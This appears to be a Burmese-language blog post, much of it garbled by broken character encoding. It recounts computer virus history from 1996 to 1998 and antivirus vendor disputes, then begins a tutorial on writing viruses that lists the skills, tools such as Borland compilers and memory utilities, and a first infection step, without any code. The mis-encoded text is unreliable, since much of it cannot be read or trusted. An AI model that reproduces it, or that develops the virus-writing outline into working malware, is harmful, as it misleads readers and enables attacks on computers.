၁၉၉၆ဇနတးျS၀#ရာေ� ၁၉၉၆ မ�� လ%သ�မ��ထငးT��႔ � ဖစပါEပ�ကာ*�စပါ�� ဖစပါ��႔ပ#�ယဆ...ပထမ�စပါ��အေကာ�� ပထမဆ6�� Windows95 virus

('Win95.Boza') တြထကာအေပၚလ� ခငး�န�႔ အေန�ကာ. စပါ��အေကာ�� ရ�ရာေ��*��ငးd6 စပါ�န ႔ပ��စပါဘး� မ�� ထ��. လန ႔ ဖစပါအေစပါခ�႔��႔ ပငး�ထနတးျT;ပအေတြထ��႔ polymorphic virus ဖစပါ.�႔ "Zhengxi" ��အေ႔ၾကာ�ငး�"� ဖစပါ"#�ယဆ။၁၉၉၆ မ�9 မ��အေ�� "Win.Tentacle" လ��အေ႔ခၚ��႔ ပထမဆ6�� Windows 3.x virus အေပၚလ�ပ#�ယဆ။ ၄ငး�ကာ ပငး8စပါ*��ငးd6မ��ရာေ��႔ အေဆ�ရာေ6��စပါ�� န�႔ � ခ�� ကာoသ��လE ဖြဖ�႔�စပါည�မ�� ရာေ�႕ computer network �စပါ��ကာ�� ကာ%�စပါကာ��႔�� ဖစပါ"#�ယဆ။ ဒ�� ဖစပါEပ�ကာX � အေ��အေ��N��၀ငးN��စပါရာေ�အေကာ�ငး�ခ�႔ပ#�ယဆ... ဘး�အေၾကာ�ငး�=9�ဆ��အေ�� ဒ� virus ဟာ� ပထမဆ6�� network အေပၚကာ��ကာ9 ��႔ ပထမဆ6�� Windows virus ဖစပါအေနလ��႔ပ#ပ�။ ��ဒ��ခ��နတးျ��ငး�ငတငး.ငတ�န �အေကာ�� Windows virus အေတြ�ဟာ� သ%��႔ကာ�� စပါ�စပါည�ထ��႔ ပစပါၥည�အေတြ�ထ�မ�� န�႔ virus ပAလ�ငတပ8ငတOအေတြ�ရာေ�႕ electornic ပစပါၥည�အေတြ�ထ�မ��သ�လ��ငး ဖစပါT��အေနခ�႔�� ဖစပါ"#�ယဆ။ boot virus အေတြ�၊ DOS virus အေတြ�န�႔ marco virusအေတြ�သ�လ��ငး တြလ�9 ပသြပN� တြသ��လ�စပါ��နငး�အေန�� ဖစပါ"#�ယဆ။၁၉၉၆ ဂတြq=နတးျ9 မ��အေ�� OS/2 �တြ�ကာ ပထမဆ6�� viurs ဖစပါ.�႔ "OS2.AEP" တြထကာ9 �ခ�႔ ပ�� ဒ� operation system ရာေ�႕

EXE file အေတြ�ကာ�� ကာ%�စပါကာ"#�ယဆ။ ��ဒ�မ��ငး�ငတငး.ငတ�န �အေကာ�� OS\2 အေ��ကာ�� virus အေတြ�ဟာ� သ%��႔ကာ��ယဆ. ��ငး file အေတြ�ကာ��စပါ��ထ�� ပ��အေရာေ��႔ �ဆငး��သ� �[m��အေနၾကာ�� ၄ငး� ��႔ကာ��သ� ဖ�ကာ( ��အေနခ�႔ၾကာပ#�ယဆ။၁၉၉၆ ဇ%လ��+ငး9ကပမ�� Microsoft Excel �တြ�ကာ ပထဆ6�� virus ဖစပါ.�႔ "Laroux" တြထကာအေပၚလ� ပ�� ခ��နတးျ.ငတည�မ��ပ� �လကာစပါကာ� န�႔ အေ��ငးE�ဖရာေ�ကာ မ��ရာေ��႔ ဆ�ကာ�မၸာဏ�အေတြ�မ�� ၄ငး� virus ကာ%�စပါကာ�;အေတြ� ဖပသြစပါ"��ခ�႔ပ#�ယဆ။ "Laroux" virus ရာေ�႕

idea အေကာ�� Microsoft Word virus အေတြ�န�႔ ဆငး.ငတO ပ�� macro (သ��႔) Basic program အေတြ�အေ�ပၚမ��အေ� ခခ6ခ�႔�� ဖစပါ"#�ယဆ။ ၄ငး� program အေတြ�ဟာ� Microsoft Excel န�႔ Microsoft Word documents *�စပါ��စပါလ6��ရာေ�႕ electornic

spreadsheet အေတြ�မ�� ပ#၀ငးအေန*��ငး"#�ယဆ။ ၄ငး��႔ဟာ� Miscrosoft Excel ထ�သ��႔ Basic language ကာ��အေ ပ�ငး�လ�အေစပါ ပ�� virus ဖနတးျ.�� ခငး�ကာ��လည� :ခငး� ပAအေစပါပ#�ယဆ။၁၉၉၆ ဒ�ဇငးj� မ�� Windows95 �တြ�ကာ ပထမဆ6�� "memory resident" virus ဖစပါ.�႔ "Win95.Punch" တြထကာ9 �ပ#�ယဆ။ ၄ငး�ကာ VxD driver ၊ file access �ခ��E ဆကာအေတြ� ကာ�႔သ��႔ Windows memory ထ�မ�� အေနၾကာ ပ�� :ဖငး�=9�,�႕ကာ. �႔ Windows EXE fileအေတြ�ကာ�� ကာ%�စပါကာ"#�ယဆ။�ၾကာမ�ဖ�ငး�� ဖငး�အေ ပ�ရာေရာေငး ၁၉၉၆ ခ�*�စပါ�� Windows32 operating system( Windows95 န�႔ WindowsNT)

န�႔ Microsoft Office application အေတြ�ထ�ကာ�� ၀ငးအေရာေ�ကာအေ*��ငး�+��ကာ. �႔ virus အေတြ� စပါ�ငး"L႕ *�6႔ အေနပ# ပ�။ ဒ�*�စပါ"��ငး��တြ�ငး�န�႔ အေန�ကာ*�စပါအေတြ�မ�� မ��:စပါ�အေသ� Windows virus မ��၊ ရာေ�အေပ#ငး�မ��:စပါ�အေသ� macro virus မ��တြထကာအေပၚလ�ခ�႔ပ#�ယဆ။ ၄ငး��႔ထ�ကာ �မ��စပါ�ဟာ� နည�ပည��သစပါအေတြ�၊ ကာ%�စပါကာ. �႔ နည�လမ��သစပါအေတြ�ကာ�� သ6�� ပAခ�႔ ပ�� အေ ခလ6�လကာ9 6� န�႔ �မ��A�မ�� A�အေ ပ�ငး�လ�*��ငတငး.�႔ :စပါမ�ရာေညအေတြ� ပ#၀ငး"#�ယဆ။ ၄ငး��႔ဟာ� virus ��ကာအေ ပ�ငး�လ�မ; ရာေ�႕ အေန�ကာအေ ခလ�မ��စပါ�� ဖစပါ"#�ယဆ။ ၂ *�ငတစပါEငတတြ�ငး�မ�� DOS virus မ��ဟာ�လည� �လ��% ��ကာ9 �ၾကာ ပနတးျ"#�ယဆ။

http://www.f-secure.com/v-descs/laroux.shtml

ttp://www.f-secure.com/v-descs/boza.shtml

တြလနတးျ��႔ ��႔ ၁၀ *�စပါ��ငး�ငး��ပ� ၄ငး� DOS virus မ��ဟာ� �စပါN�စပါN န�႔ �%ည�အေသ� feature အေတြ�ကာ�� စပါ�ငးEသ6�� ပAခ�႔ပ#�ယဆ။ ဒ#အေပမယဆ� နည�ပည��ဆငး�အေ�� အေန�ကာ. ငတစပါ(ငး�+��,� �ကာ9 �မ�*��ငး��႔ပ#�ယဆ။

၁၉၉၇

အေအေဖဖ�၀#ရာေ� ၁၉၉၇ : Linux ( a Unix clone ) �တြ�ကာ ပထမဆ6�� virus အေပၚတြထကာ9 �ခ�႔ပ#�ယဆ...။ ��ဒ� virus ရာေ�႕ န�မအေ[\�� "Linux.Bliss" လ��အေ႔ခၚပ#�ယဆ။ ��ဒ�လ��လမ�အေၾကာ�ငး�အေတြ�န�႔ Virus အေတြ�ဟာ� အေန�ကာc ပT�ငတငး8န အေပ#ကရြကာU��*��ငး�ယဆ� အေနရာေ��စပါ��ကာ�� သ�မ�ပ��ကာ9 ��ကာ ပနတးျ"#�ယဆ။အေအေဖဖ�၀#ရာေ� - ဧျ ပ� ၁၉၉၇ : macro virus မ��ဟာ� office 97 ဆ�ကာ�� အေ ပ�ငး�အေရာေy႕ တြသ��ပ#�ယဆ...။ ��ဒ�virus အေတြ�ထ�ကာ ပထမဆ6�� virus အေတြ�ဟာ� Microsoft Word 6/7 �တြ�ကာU+နတးျ.��ထ��႔ macro virus အေတြ�ရာေ�႕ ပ6�စပါ6ကာ�� အေ ပ�ငး�လ�လ��ကာ ခငး�သ�လ��ငး ဖစပါ"#�ယဆ။ ဒ#အေပမယဆ� ခ�ကာ��ငး�ဆ��သလ��ပ� office 97 document အေတြ��တြ�ကာ သ��သန ႔ virus အေတြ�လည� တြထကာအေပၚလ�ခ�႔ပ#�ယဆ...။မ�9 ၁၉၉၇ : "ShareFun" လ��႔ အေခၚ��႔ marco virus ကာ Microsoft Word 6/7 ကာ�� ထ��*�ကာအေနခ�႔ပ#�ယဆ။ ၄ငး� virus

ဟာ� Microsoft Word ရာေ�႕ standard feature အေတြ�ကာ��သ6�� ပA ပ�� virus ကာ%�စပါကာအေ��ငး9,�ပT6��ငး�ကာပ� MS-Mail အေတြ�အေကာန�ဆငး� သ%႔ဟာ�သ% copy အေတြ�လ�ပ ပ�� ပ��႔ပ#အေသ��ယဆ။ဧျ ပ�လ ၁၉၉၇ : "Homer" လ��အေ႔ခၚ��႔ Virus အေတြ�:ပ��လ�ဖ��႔�တြ�ကာ File Transfer Protocol( FTP ) အေတြ�ကာ��သ6�� ပA��႔ ပထမဆ6�� network worm virus အေတြ� တြထကာ9 �ပ#�ယဆ...။:ဇ=နတးျ9 ၁၉၉၇ : Windows 95 �တြ�ကာ ကာ��ယဆ. ��ငး encrypting လ�ပ*��ငတငး.�႔ virus အေအေတြ�ပၚတြထကာ9 �ပ#�ယဆ။ ��ဒ� virus ရာေ�႕ မ%လ�စပါအေကာ�� ရ�ရာေ��ကာ ဖစပါ ပ�� ၄ငး�ကာ�� အေမ�Nကာ�� မ�A႕ ရာေ�� BBS မ��ဆ�ပ��႔ ပ�� ပန ႔:ပ��အေစပါခ�႔�� ဖစပါ"#�ယဆ။*��၀ငးj� ၁၉၉၇ : "Esperanto" ဆ��႔ DOS န�႔ Windows32 executable files အေတြ�ကာ��သ�မကာပ� Mac OS (Macintosh) အေတြ�ဆ�ကာ��ပ# ပန ႔*�႔6 ၀ငးအေရာေ�ကာ*��ငတငး.�႔ ပထမဆ6�� virus အေပၚလ�ပ#�ယဆ။ ကာ6အေကာ�ငး�အေထ�ကာ�:စပါ�ပ� ၄ငး� virus ဟာ� bug အေအေတြ�ၾကာ�ငး� platform အေတြ�ကာ�� ဖ� ပ�� မပL႕႕ *�6႔ *��ငး"#ဘး%�။ဒ�ဇငးj� ၁၉၉၇ : virus ပ6�စပါ6�သစပါ ဖစပါ.�႔ "mIRC Worm" အေတြ�ရာေ�႕ �စပါပ��ငး�ကာ��အေရာေ�ကာT��လ�ခ�႔ပ#�ယဆ။ ၄ငး� virus ဟာ� လ%သ��မ��ဆ6�� ဖစပါ.�႔ Windows Internet Relay Chat (IRC) utility မ�� virus script အေတြ�ကာ�� လကာ�6 ပ�� ၄ငး� virus မ��ကာ��ယဆ. ��ငး IRC-Channels အေ�လ��ကာ ထ��9 y�*��ငတငး.�v "hole" အေကာန Virus အေတြ�ကာ�� ပန ႔*�6႕ အေစပါ�� ဖစပါ"#�ယဆ။ ဒ#အေပမယဆ� IRC

ရာေ�႕ အေန�ကာc �� Version မ��အေ�� ၄ငး� hole ကာ�� block လ�ပ��႔��႔�တြ�ကာ mIRC Worm မ�� အေပ��ကသြားျကာ� ယဆ��႔ရာေပ#�ယဆ။

KAMI ltd. anti-virus ဌာ�နဟာ� မ%လကာ�မၸာဏ�အေကာနတးျKပ�� ဖြခ�တြထကာ�# သ�� ခ��ရငတပ.[��႔ပ#�ယဆ...။ ဒ�� ဖစပါEပ�ကာX � ၁၉၉၇ ရာေ�႕ ထ%� ခ��႔ �ဓ�ကာ� ဖစပါEပ�ကာ9 ��႔ဆ��*��ငး"#�ယဆ...။ ယဆခ��ခ��နတးျEခ#မ��အေ�� ၄ငး� ကာ�မၸာဏ�ကာ�� Kaspersky Labs လ��႔ အေခၚ ပ�� anti-

virus industry အေတြ�ကာ�� ဥး�အေဆ�ငး ဥး�ပသြရာေကာ ပAအေန��႔ ကာ�မၸာဏ� �စပါ�� ဖစပါ8,��6ထ��ရာေပ#�ယဆ...။၄ငး� ကာ�မၸာဏ�ဟာ� ၁၉၉၄ မ��ကာ�ည�ကာ ကာ�မၸာဏ�ရာေ�႕ �ဓ�ကာ ထ��9 �ပ��႔��႔ AntiViral Toolkit Pro (AVP ) anit-virus scanner ဟာ� ကာမ�ၻ�၀�မ�ရာေ�� လကာအေတြ�႔စပါမ�သပ�န � အေ��အေ��မ��မ�� မငး��႔ ရာေလဒS�႔ အေ��ငး မငး�;ရာေခ�႔ပ#�ယဆ။ ဒ�ဖြခ�တြထကာ� �မၸာဏ�ကာ developer မ��ရာေ�႕ �ဖြဖ�႔ငးယဆအေလ�အေတြ�ကာ�� ပသြမfငး�အေစပါ��တြကာကာ� �� ဥး��ည ပ�� မ�E :စပါန �မ��ရာေရာေ��ဖ��႔ �:ခငး�အေEရာေ�အေပ�ခ�႔�ယဆ...ဒ#အေၾကာ�ငး�=9� ကာမ�အေၻကာ��Fကာ�� ကာ�မၸာဏ��စပါ�� ဖစပါ��႔ပ#�ယဆ...။ Short run versions မ��တြ�ကာ၊ ဖစပါ*��

ငးအေ ခရာေ�� ပ�� လ%သ6��မ��ဆ6�� ဖစပါ.�႔ platform မ��တြ�ကာ ��ကရြကာU6႕ ဖ�A�အေစပါ ခငး�၊ ထ��9 �ပ ခငး� ၊ anti-virus

solutions �သစပါ�� အေပ� ခငး�၊ *��ငးd6�ကာ� ဖန ႔ဖ�{�မ;မ�� ပAလ�ပ ခငး� န�႔ product support network မ�� ဖန �� ခငး��႔ကာ�� ပAလ�ပ��႔ပ#�ယဆ။

အေ��ကာ. ��ဘး� ၁၉၉၇ - F-Secure Anti-Virus (FSAV) မ�� AVP နည�ပည�ဆ��ငးT� လ��ငးNငတငး��ငတ� �သ6�� ပAဖ��႔�တြ�ကာ အေသဘး��%စပါ�ခ�Aပ�� လကာ��အေရာေ�ထ��ခ�႔ၾကာပ#�ယဆ။ F-Secure Anti-Virus (FSAV) package ဟာ� DataFellows (Finland) anti-virus

product �သစပါ ဖစပါ��႔ပ#�ယဆ။ ��ဒ�မ��ငး�အေငး�� DataFellows ကာ�� F-PROT anti-virus package manufacturer လ��႔ အေခၚပ#�ယဆ။

၁၉၉၇ ခ�*�စပါ��လည�ပ� US န�႔ အေဥးရာေ�ပ မ��ရာေ��႔ �ဓ�ကာ anti-virus ထ��9 �ငတပ8ငတOမ��ၾကာ��မ�� အေမကာ�ငး�သ�ငး�အေအေတြ��ရာေ��ခ�႔ပ#�ယဆ။ *�စပါNပ��ငး�မ�� McAfee ကာ သ%ရာေ�႕ �ဓ�ကာ ပ�Aငးjကာ ဖစပါ.�႔ Dr.Solomon ရာေ�႕ anti-virus program မ��ထ�မ�� "feature" �စပါ��ကာ�� သ%��႔ရာေ�႕ ကာတြqမ�ကာ�ငး8ငတOအေတြ�ကာ အေတြ�႔ရာေ��ခ�႔ ပ�လ��႔ အေၾကာ ငး�ခ�႔ပ#�ယဆ။ McAfee ရာေ�႕ သကာ ပခ�ကာ��စပါ�ငး��႔ ပ�� ဒ�သကာအေသခ6ခ�ကာအေတြ�အေကာ�� မ��:စပါ�အေသ� virus-type မ��ကာ�� ရာေ��အေ:ဖဖ��႔�တြ�ကာ scan ဖ�အေနစပါဥးEခ��နတးျEတြ�ငး�မ�� Dr.Solomon ရာေ�႕ anti-virus မ��ဟာ� advanced scanning mode ကာ�� switch လ�ပသြပD��ယဆ9 ��႔ဆ��ပ#�ယဆ။ ��ဒ��ဓ�ပၸာ�အေယဆ� �� ခ��A႕ Virus ကာ%�စပါကာc �� ခငး�မရာေ��႔ computer မ��ကာ�� scan ဖ�အေနစပါဥးEတြ�ငး�မ�� Dr.Solomon ရာေ�႕ anti-

virus အေတြ� usual mode မ��လ[��အေနတးျKပ�� advanced mode ကာ��ကာ%�အေ ပ�ငး�တြသ��ပ#�ယဆ ... McAfee ရာေ�႕ �ဆ��အေရာေ�� "cheat mode" ( ၄ငး�ကာ usual mode virus မ��တြ�ကာ virus collection မ��ကာ�� စပါမ�သပအေနစပါဥးEတြ�ငး�မ�� မ မငး*��ငးအေစပါဘး� detect လ�ပU��႔ application ကာ�� စပါ�ငး9,�ပအေဆ�ငးအေစပါပ#�ယဆ။) ဆ��ပ#�ယဆ။ ��ဒ��တြ�ကာ �ကာ��A�ဆအေကာ� �� Dr.Solomon ရာေ�႕ anti-virus မ��ဟာ� virus မ၀ငးc��႔ disk မ��ကာ�� scan ဖ�. �႔�ခ# *�စပါ��လ6�� speed အေကာ�ငး� ပ�� virus collection မ��ကာ�� scan ဖ�အေနစပါဥးEတြ�ငး� virus ကာ��အေကာ�ငး�:စပါ� ရာေ��အေ:ဖ*��ငး"#�ယဆ။�ခ��နတးျEနည�ငးယဆE ၾကာ�မ��ပ� Dr.Solomon ကာ McAfee ရာေ�႕ :စပါပစြပN�ခ�ကာ��ဟာ� မမ�+နတးျ�န အေၾကာ�ငး� ��န ႔ ပနတးျ9�ငတ�ကာ"#�ယဆ။ �ခ��ငးEမ�အေ ပ�ခ�႔��အေကာ�� " ကာမ�ၻ�:ခငး�� Dr.Solomon ရာေ�႕ anti-virus ဟာ� အေ�ကာ�ငး�ဆ6��အေပသြရာေ�ခ�ယဆ�;�စပါ�� ဖစပါအေစပါရာေမယဆ ... ��လ��မ� မဟာ��j O�ဆ��ရာေငး သ%႔ကာ�မၸာဏ�ကာ�� ဖ�ကာ8 �မ�လ��ကာ�ယဆ" လ��႔ပ#�ယဆ။ �ခ��နတးျ.ငတည�မ��ပ� McAfee ဟာ� Trend Micro န�႔ � ခ�� antivirus software ထ��9 �ငတပ8ငတOမ��န�႔��% Internet *�ငး� e-mail data scanning နည�ပည�မ%ပ��ပသြငး�ငး� ခ��A�အေဖ�ကာ�;အေတြ�န�႔ ပ�8 � ပ�� မ;ရငတငး(�ငတ�ငးအေနခ�႔ပ#�ယဆ။ ဒ# �� ပငး Symantec ကာလည� McAfee ဟာ� Symantec codes အေတြ�ကာ�� McAfee product အေတြ�မ�� သ6�� ပA�ယဆ9 ��႔ :စပါပစြပN� ပ�� မ; ပAလ�ပ ခငး�အေတြ� စပါသည ဖငး� ဖစပါ��႔ပ#�ယဆ။

*�ငတစပါ(6��ပ��ငး�မ��အေ�� McAfee �မည � ဖစပါEပ�ကာအေအေတြ��အေ��မ�� ဖစပါ��႔ပ#�ယဆ... ��ဒ#အေကာ�� McAfee န�႔ Network General ကာ Network Assciates Company �သပစြစပါU�႔စပါည�အေၾကာ�ငး�အေၾကာ ငး� ခငး�န�႔ သ%��႔ရာေ�႕

services မ��တြ�ကာ anti-virus protection software အေစပါ��တြကာကာ��သ�မကာပ� computer safety universal system

မ��၊ encryption န�႔ network administration အေစပါ��တြကာကာ"#ကာ��ပ# အေနရာေ�ခ�ထ�� ခငး� ပAလ�ပ��႔ပ#�ယဆ။

၁၉၉၈

Virus မ��ကာ MS Windows , MS Office ��ကာ��ကာ��႔ၾကာသလ�� network application မ��ကာ�� ကာ��ကာ�;ကာလည� ��အေမပ��

ခ�႔ပ#ဘး%�။ Virus �သစပါ��ရာေ�႕ ရာေ;ပအေတြထ��႔ ထ��*�ကာ��ကာအေတြ� န�႔ network အေကာန computer ဆ�သ��႔ ထ��အေဖ�ကာ�; နည�လမ�အေတြ�ဟာ�လည� ��ကာ9 �ခ�႔ပ#�ယဆ။ ဒ# �� ပငး Internet access passwords မ��ကာ�� ခ��ယဆ%��႔ Trojan မ�� န�႔ ငး�+ပ9��A�အေန��႔ administration utilities မ��လည� တြကာန ပ{��ကာမ�ၻဆ�သ��႔ အေရာေ�ကာT��လ�ခ�႔ပ#�ယဆ။ Virus ပ#၀ငး.�႔ CD မ��အေၾကာ�ငး�=9,ည� � ဖစပါEပ�ကာ��:စပါ� ဖစပါ��႔ပ#�ယဆ... ဘး�အေၾကာ�ငး�=9�ဆ��အေ�� ခ��Aအေ႕သ� media publisher အေတြ�ကာ CIH န�႔ Marburg ( Windows viruses) ��႔ကာ�� သ%��႔ရာေ�႕ ဖန ႔ခ��မ;မ��ကာ�� ကာ�တြကာယဆU��႔�တြ�ကာ CD မ��မ�� တြ��ဖကာ��႔��အေၾကာ�ငး� ဖစပါ"#�ယဆ။

*�စပါNပ��ငး�မ�� "Win32.HLLP.DeTroie" virus ��ပN�၀ငး�� ကာ%�စပါကာ ပန ႔*�6႕ ခငး� ဖပသြစပါ"��ခ�႔ပ#�ယဆ။ ၄ငး� virus အေတြ�ဟာ� Windows32 executed file မ��ကာ�� ကာ%�စပါကာT6��ငး�ဟာ��"� ကာ��ယဆ"��ငး information အေတြ�ကာ��လည� computer အေပၚမ�� ထ��9 yငး�*��ငတငး.�႔ :စပါမ�ရာေ[m��ၾကာပ#�ယဆ။ ဒ#အေၾကာ�ငး�=9,ည� တြကာန ပ{��အေလ�ကာမ�� ထ��. လန ႔ ဖစပါအေစပါခ�႔ရာေ��ပ#။ specific libraries ကာ��သ6�� ပAထ�� virus အေတြ�အေကာ�� French version Windows အေတြ�မ�� တြ��ဆကာ"#၀ငးအေနၾကာ ပ�� Virus ကာ%�စပါကာ�;ဟာ� ပငး8,စပါNကာ��သ6�� ပA��႔ *��ငးd6အေတြ�မ�� ကာ��A�သကာအေရာေ�ကာ�;အေတြ�ရာေ��အေစပါခ�႔ပ#�ယဆ။

အေအေဖဖ�၀#ရာေ�လ ၁၉၉၈ : Excel table မ��မ�� ကာ%�စပါကာ. �႔ virus ပ6�စပါ6အေန�ကာ. စပါ��A� ဖစပါ.�႔ "Excel4.Paix" ( [သ��႔]

"Formula.Paix) အေပၚတြထကာ��vပ#�ယဆ။ ဒ��မ��A��စပါ�� macro virus �စပါ��မ��အေ�� virus marco area �မ��A��စပါ��တြ�ကာ �သ6�� ပAအေနကာ� Excel table မ��တြ�ငး�မ�� အေ� ခခ6 ပ�� သ6��ခ�ထ��မဟာ��"#ဘး%�...။ ဒ#အေပမယဆ� အေဖ� မ{လ��အေရာေ�� self-reproduction code ကာ��ဆငးအေ အေပ��ငး အေနရာေ�ခ�ထ��*��ငတငး.�႔ :စပါမ�ရာေ[m��ၾကာပ#�ယဆ။

အေအေဖဖ�၀#ရာေ� - မ�9 ၁၉၉၈ : ပထမဆ6�� တြသ+ငးEမ�� A��မ��A�ကာ��ကာ%�အေ ပ�ငး�*��ငတငး.�v Windows32 virus မ�� တြထကာအေပၚလ� ပ�� ပL*�႔6တြသ��ခ�႔ပ#�ယဆ။ anti-virus programs developer မ�� ဘး�မ�မလ�+ပ9�,�ကာS��ငး��႔ပ#ဘး%�။ ဒ#အေပမယဆ� ��ဒ� virus အေတြ�ကာ�� ရာေ��အေ:ဖ��႔ နည�ပည� အေတြ�ကာ��အေ�� ပ%� ပငး� ပA ပငး��ငတ�ကာ� �� ခငး�၊ DOS- virus မ��တြ�ကာ ဒ�ဇ��ငး� ပAလ�ပ ခငး� မ��န�႔ အေ� ခအေ�န�သစပါ��ငတ� ပAလ�ပ��႔ရာေပ#�ယဆ။

မ�9 ၁၉၉၈ : "AccessiV" လ��အေ႔ခၚ��႔ ပထမဆ6�� Microsoft Access virus အေ:မ�:ဖ��ခ�႔ပ#�ယဆ။ ၄ငး� virus အေကာ�� ( "Word.Concept" န�႔ "Excel.Laroux" virus မ��ကာ�႔သ��႔) ဘး�မ�ထ%�ထ%�အေအေတြထတြထ ထ�ခ��ကာ မ[��အေစပါခ��အေတြ� မရာေ��ခ�႔ပ#ဘး%�။မ�9 ၁၉၉၈ : ပထမဆ6�� MS Office application *�စပါ��ကာ�� ကာ%�စပါကာ*��ငတငး.�႔ virus "Cross" macro-virus အေပၚလ�ပ#�ယဆ။ ဒ� virus မ��ငး�ငး��အေ�� virus မ��ဟာ� MS Office application �စပါ��မ� သ%��႔ရာေ�႕ code မ��ကာ�� ခ�� application မ��မ�� ဖစပါအေပအေၚစပါ�� ဖစပါ"#�ယဆ။

အေမလ ၁၉၉၈ : "RedTeam" viurs ကာ Windows EXE -files မ��ကာ�� ကာ%�စပါကာ ပ�� virus ပ#��႔ file အေတြ�ကာ�� e-mail � ဖစပါ ပ��႔လy�"#�ယဆ။

Virus ဖနတးျ*��ခားငး�� သငး�န ��စချ�မား��

�မ�+နတးျ(�ငတ�ရာေငးအေ�� ဒ�post ကာ�� Virusအေရာေ�နည�အေတြ� မ�ငး�ငး �ငးအေပ�ရာေမ��ပ#။ ဒ#မ�ပ�� ပ��န��လအေ[Dဘး�အေပ#ကသြားျကာ9 ယဆ�� ဖစပါ"#�ယဆ။ �ငးTမယဆ� Post ကာရာေ�ညအေ��ပ��ငး�လ��ကခြျကာ�� ပ��ငးU��႔ စပါဥး�စပါ��ထ��ပ#�ယဆ။�ခ��A႕ တြကာန ပ{��သ6��အေ၀#ဟာ�အေရာေတြ�ဟာ� မနတးျ��လ��ဘး�သ� ပနတးျ9�ငတ�ကာTငတငးEငတတြလနတးျT�[s �� ပ��မ�ကာN�ပ��ရာေ;ပ"#�ယဆ။ဒ#အေၾကာ�ငး�+.�,��န�႔လ��ရာေငး�အေရာေ�ကာအေ��ငး မ%ရာေငး��ဂ�လ�ပN�လ6��အေတြ�ကာ��ပ� သ6��ထ��ပ#�ယဆ။Virus ဖနတးျ.�� ခငး��တြ�ကာ သ�ထ��ရာေမယဆ� �ခ�ကာအေတြ�န�႔ နည�ပည�ပ��ငး�အေတြ� ပ#၀ငး�� ဖစပါ"#�ယဆ...။

Virus မ�� *�ငး� မ��( ကာ ခငး�Virus ဆ�� ခ�� programs အေတြ� ဖ��ငးအေတြ� န�႔ သ%��႔ရာေ�႕ � ပA�မ%အေတြ�ကာ�� ကာ��ယဆ. ��ငး"6��%:ပ��႔ Program ဖစပါ"#�ယဆ။Viruses အေတြ�ကာ�� သ%��႔ရာေ�႕ ဖ��ငးအေတြ�၊ ��ကာ��ကာ. �႔နည�လမ�အေတြ� ၾကာည� ခငး�� ဖငး� အေ��ကာ"#��ငး� အေတြ�႔ရာေပ#�ယဆ။Boot VirusesProgram VirusesMultipartite VirusesStealth VirusesPolymorphic VirusesMacro VirusesActive XFAT(File Allocation Table)

COM Viruses ��႔ပ� ဖစပါFကာပ#�ယဆ။

Viruses �မ��A��စပါ��ဖြခ� ခ�� ခငး�Virusအေတြ�ကာ�� သ%��႔ရာေ�႕ �ပသြရာေယဆE စပါ��ကာ�� ၾကာည� ခငး�� ဖငး� ၃ မ��A�ဖြခ� ခ��ထ��ပ#�ယဆ။(၁) Tiny Virus

(size ၅၀၀ bytes ရာေ�႕ အေ��ကာ )(၂) Large Virus

(size ၁၅၀၀ bytes ရာေ�႕ �ထကာ)(၃) Other Virus ��႔ ဖစပါ"#�ယဆ။

Virus �စပါ�� ကာ��ကာ ခငး�ရာေ�႕ လကာၡဏ�ရာေပ��Virus �စပါ�� ကာ��ကာ ခငး�ရာေ�႕ လကာၡဏ�ရာေပ��အေကာ�� အေ��ကာ"#��ငး� ဖစပါ"#�ယဆ။ၾကာ��မ��အေသ� program ကာ�� loading လ�ပအေနရာေသလ�� ခ��နတးျFကာ� ခငး�၊ဖ��ငး န�႔ Folders မ��ကာ�� :ဖငး�Tန ခကာ�� ခငး�၊ထ%� ခ��:စပါ� floppy (သ��႔) Hard disk မ� �ခ�ကာE လကာ��ကာ��လကာ�6အေနတးျKခငး�၊disk space �သ6�� ပAမ;��လ� ခငး� န�႔ ဖ��ငတငးEငတပသြရာေယဆE စပါ��မ�� ၾကာ��မ��လ� ခငး�၊ပ6�မ�နတးျ�ဟာ��အေသ� write-protect errors မ�� ဖစပါ ခငး�၊ဖ��ငးS�မ[~��ရာေ�႕ directory list �တြ�ငး�တြ�ငး ထ%� ခ��အေသ� စပါ�လ6��မ��အေပအေၚနတးျKခငး�၊ထ%� ခ�� ပ�� အေမ��9ငး��ထ��အေသ� messages မ��အေတြ�႔ရျZခငး�၊ထ%� ခ��အေသ� ပ6�ရာေ�ပ��အေဖ� အေပနတးျKခငး�၊Program န�႔ system ��႔ hang တြသ�� ခငး� ��႔ပ� ဖစပါ"#�ယဆ။

Virusesအေရာေ� ခငး��တြ�ကာ မရာေ��မ ဖစပါT��ထ��ရာေမယဆ� �ခ�ကာ��(၁) assembly language ဗဟာ�သ��memory management ကာ�� န��လည ခငး�၊registers ကာ�� န��လည ခငး�။(၂) C language န�႔ပ�8 �. �႔ ဗဟာ�သ��Pointers ရာေ�႕ �ယဆ%�ဆမ��Function န�႔ procedure calling

လ��ပအေသ� Tool န�႔ Utilitie မ��(၁) C compiler ( Borland Turbo Assembler (သ��႔) Borland C++)

(၂) Norton Utilities

(၃) Memory management utilities

MAPMEMPMAPMARK/RELEASE

Virus ကာ%�စပါကာ ခငး��ဆငး�+Eဆငး� ပပ6�

န��လညအေလ�ကာ�ယဆ9 ��အေ႔မ��9ငး�Tပ#�ယဆ။Virus ကာ%�စပါကာ"6��ဆငး�+(ငး�S�႔ နည�လမ�အေတြ�ကာ�� ပ��ငး�(၂)မ�� ဆကာ9 ကာအေဖ� အေပပ�ထ��ပ#�ယဆ...။

Virus ကာ%�စပါကာ ခငး�မ�� ဆငး� (၅) ဆငး�T��ပ#�ယဆ။ ဒ��ပ��ငး�မ��အေ�� ဆငး� (၃)ဆငး�+��,�ပ� အေဖ� အေပပ�တြသ��ပ#မယဆ။

Virus က��စချက��ခားငး�� : အဆငး"�� (၁)

က��စချက8န � ဖ�ငး8&�ေ�ဖြျဖ��ခားငး��

http://4.bp.blogspot.com/_-SA0bLCWpIA/Swh0NRLU2GI/AAAAAAAAACk/F23tCIeF8Oc/s1600/virus+inflect+flow+chart11.JPG

